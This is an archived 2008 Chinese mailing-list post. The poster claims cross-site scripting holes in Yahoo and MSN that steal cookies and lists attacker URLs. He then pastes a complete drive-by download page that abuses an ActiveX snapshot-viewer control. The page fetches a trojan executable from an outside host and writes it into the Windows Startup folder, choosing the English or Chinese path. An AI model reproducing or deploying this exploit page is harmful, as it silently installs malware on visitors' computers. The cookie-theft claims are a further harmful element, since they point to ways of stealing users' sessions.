有能讨论的 就加我QQ吧 190000973 .我的地址 [EMAIL PROTECTED] | 2008/10/23 [EMAIL PROTECTED] <[EMAIL PROTECTED]>
> 2008-10-23 > > > 今天 好像yahoo跟MSN的跨站漏洞有被我挖掘到了 > > > 透露下一点点的小信息 跟上次的2次的 一样 关键部分还是有点小变化的 利用的document.cookie);关键语句达到跳 > > > 转目的 地址:http://www.coloreagle.com/hotmail/ > > > http://www.coloreagle.com/yahoo/ > > > 我还无意中抓到了一个网马 > > http://www.coloreagle.com/yahoo/ddd.html > > > > 代码如下:<html> > <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' > id='obj'></object> > > > > <script language='JavaScript'> > var buf1 = 'http://www.coloreagle.com/yahoo/a.exe'; > var buf2; > var sysLanguage; > sysLanguage=navigator.systemLanguage? > navigator.systemLanguage:navigator.language; > if(sysLanguage == 'en-us' || sysLanguage == 'en-us'){ > buf2="C:/Documents and Settings/All Users/Start > Menu/Programs/ > Startup/setup.exe"; > } > if(sysLanguage == 'zh-cn' || sysLanguage == 'zh-CN'){ > buf2 = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/ > setup.exe"; > > } > obj.SnapshotPath = buf1; > obj.CompressedPath = buf2; > obj.PrintSnapshot(); > > </script> > </html> > > > > 区分中英文版本 A。EXE是个木马 呵呵, > > > > 具体的细节我就不透露过多了 毕竟一些大牛牛还是要靠这些来吃饭的 > > > > > [EMAIL PROTECTED] 本人联系方式。有任何意见可以跟我交流 --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [EMAIL PROTECTED] -~----------~----~----~----~------~----~------~--~---
